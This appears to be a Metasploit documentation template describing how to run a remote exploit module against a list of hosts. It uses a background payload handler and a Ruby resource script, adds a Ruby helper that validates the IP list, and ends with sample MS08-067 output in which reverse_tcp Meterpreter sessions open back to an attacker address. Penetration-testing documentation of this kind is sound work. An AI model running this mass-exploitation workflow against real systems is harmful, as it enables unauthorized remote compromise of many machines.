Normally, you can use <%= mod.fullname %> this way:

```
msf > use <%= mod.fullname %>
msf <%= mod.type %>(<%= mod.shortname %>) > show targets
... a list of targets ...
msf <%= mod.type %>(<%= mod.shortname %>) > set TARGET target-id
msf <%= mod.type %>(<%= mod.shortname %>) > show options
... show and set options ...
msf <%= mod.type %>(<%= mod.shortname %>) > exploit
```

But since this is a remote exploit module, you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module, one IP per line.

Second, set up a background payload listener. This payload should be the same as the one your
<%= mod.shortname %> will be using:

1. Do: ```use exploit/multi/handler```
2. Do: ```set PAYLOAD [payload]```
3. Set other options required by the payload
4. Do: ```set EXITONSESSION false```
5. Do: ```run -j```

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path and
the payload options accordingly:
```
<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  # each_line yields the trailing newline with every line; strip it so the
  # address is passed to "set RHOST" cleanly, and skip blank lines.
  ip = ip.strip
  next if ip.empty?

  print_status("Trying against #{ip}")
  run_single("use <%= mod.fullname %>")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>
```
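The script above feeds every line of the IP list straight into `set RHOST`, so a typo, a stray CIDR range or a blank line in the file ends up as a malformed target or a wasted run. The following is an added example, not part of the original template or of Metasploit itself, that loads and validates such a "one IP per line" file before the loop runs: comments and blank lines are ignored, duplicates are dropped, and anything that is not a single host address is reported with its line number. The `SAMPLE_LIST` contents and the `parse_ip_list`/`load_ip_list` names are constructed for this example; only Ruby's standard `ipaddr` library is used.

```ruby
require 'ipaddr'

# Parse a target list in the format the guide asks for: one IP per line.
# Blank lines and '#' comments are ignored, surrounding whitespace is stripped
# (File#each_line yields each line with its trailing newline), and entries that
# are not valid single IPv4/IPv6 host addresses are reported instead of being
# silently passed on to "set RHOST".
# Returns [accepted, rejected]; accepted is de-duplicated, in file order.
def parse_ip_list(text)
  accepted = []
  rejected = []
  text.each_line.with_index(1) do |raw, lineno|
    line = raw.sub(/#.*/, '').strip
    next if line.empty?
    begin
      addr = IPAddr.new(line)
      # IPAddr also accepts ranges such as "10.0.0.0/8"; the guide wants
      # individual hosts, so anything with a shorter prefix is rejected.
      host_prefix = addr.ipv4? ? 32 : 128
      raise ArgumentError, 'network range, not a host' unless addr.prefix == host_prefix
      accepted << addr.to_s unless accepted.include?(addr.to_s)
    rescue ArgumentError => e # IPAddr::InvalidAddressError is an ArgumentError
      rejected << "line #{lineno}: #{line.inspect} (#{e.message})"
    end
  end
  [accepted, rejected]
end

# Convenience wrapper for the on-disk list (e.g. '/tmp/ip_list.txt').
def load_ip_list(path)
  parse_ip_list(File.read(path))
end

# Constructed sample list for demonstration (not from the original page).
SAMPLE_LIST = <<~LIST
  # hosts to test
  192.168.1.80
  192.168.1.109   # trailing comment
  192.168.1.80
  10.0.0.0/8
  300.1.2.3
  2001:db8::1
LIST

if __FILE__ == $PROGRAM_NAME
  accepted, rejected = parse_ip_list(SAMPLE_LIST)
  puts "accepted: #{accepted.join(', ')}"
  rejected.each { |r| warn "rejected #{r}" }
end
```

Inside the resource script, `load_ip_list(ip_list)` can replace the raw `File.open(...).each_line` loop: iterate over `accepted` and print the `rejected` entries with `print_error` so a bad line is visible before any module run starts rather than discovered as a failed `set RHOST`.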

Next, run the resource script in the console:

```
msf > resource [path-to-resource-script]
```

And finally, you should see that the exploit is trying against those hosts, similar to the following
MS08-067 example:

```
msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600
```